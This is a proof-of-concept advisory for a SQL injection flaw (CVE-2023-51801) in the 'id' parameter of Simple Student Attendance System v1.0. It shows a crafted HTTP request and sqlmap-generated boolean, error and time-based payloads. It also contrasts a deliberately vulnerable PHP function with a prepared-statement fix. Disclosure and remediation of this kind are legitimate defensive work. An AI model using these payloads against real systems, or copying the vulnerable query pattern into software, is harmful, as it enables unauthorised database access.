
CVE-2023-51801 PoC — Simple Student Attendance System Security Vulnerability

Source
Associated Vulnerability
Title: Simple Student Attendance System Security Vulnerability (CVE-2023-51801)
Description: SQL Injection vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the id parameter in the student_form.php and the class_form.php pages.
Readme
# CVE-2023-51801
# Simple Student Attendance System v.1.0 - Multiple SQL injection vulnerabilities - student_form.php and class_form.php

**Description**: Simple Student Attendance System v.1.0 is prone to multiple SQL injection vulnerabilities that can be exploited by authenticated attackers. These vulnerabilities exist in student_form.php and class_form.php, allowing for the execution of arbitrary SQL commands via the 'id' parameter.  

**Vulnerable Product Version**: Simple Student Attendance System v.1.0  
**CVE Author**: Geraldo Alcântara  
**Date**: 29/11/2023  
**Confirmed on**: 10/01/2024  
**CVE**: CVE-2023-51801  
**CVE Link**: https://www.cve.org/CVERecord?id=CVE-2023-51801  
**NVD Link**: https://nvd.nist.gov/vuln/detail/CVE-2023-51801  
**Tenable Link**: https://www.tenable.com/cve/CVE-2023-51801  
**Tested on**: Windows  
### Steps to reproduce:  
The vulnerable code is reached from the 'Student' or 'Classes' pages: editing or adding a student or class submits the 'id' parameter to student_form.php or class_form.php, and the payload is supplied in that 'id' parameter.  
**Affected Component**:  
> Components:  student_form.php and class_form.php  
> Parameter: id  
## Request:
```
POST /php-attendance/modals/class_form.php HTTP/1.1
Host: 192.168.68.182
Cookie: PHPSESSID=emhqgom5shgrtcii7p3a8ad1bo
Content-Length: 4
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.68.182
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.68.182/php-attendance/?page=class_list
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
Connection: close

id=1'
```
## SQLMap
```
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1''' AND 4206=4206-- KDFY

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1''' OR (SELECT 1707 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1707=1707,1))),0x717a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xsae

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1''' AND (SELECT 1288 FROM (SELECT(SLEEP(5)))SVhp)-- EYkh
```
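The following is an added illustration, not code from the Simple Student Attendance System itself: it shows the pattern the advisory describes (the 'id' POST parameter concatenated into a query, so `id=1'` breaks the quoting) next to a hardened version that validates the type and binds the value with a prepared statement. The table and column names (`classes`, `id`) and the use of `mysqli` with `mysqlnd` (needed for `get_result()`) are assumptions.

```php
<?php
// Added example, not the project's own code. Table/column names are assumed.

// Vulnerable pattern (what CVE-2023-51801 describes): untrusted input is spliced
// into the SQL string, so a single quote in 'id' changes the query structure and
// sqlmap's boolean-, error- and time-based payloads from the page all apply.
function load_class_vulnerable(mysqli $db, array $post): ?array {
    $sql = "SELECT * FROM classes WHERE id = '" . ($post['id'] ?? '') . "'";
    $res = $db->query($sql);            // id=1' => SQL syntax error from MySQL
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened version: reject anything that is not a positive integer before the
// database is touched, then bind the value so it can never be parsed as SQL.
function load_class_safe(mysqli $db, array $post): ?array {
    $id = filter_var(
        $post['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {                // "1'" fails validation here
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare("SELECT * FROM classes WHERE id = ?");
    $stmt->bind_param('i', $id);        // 'i' = integer parameter
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

A quick regression check for the hardened path is to submit `id=1'` and confirm the response is a 400 with no database error text, while `id=1` still returns the record.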
Discoverer(s)/Credits:  
Geraldo Alcântara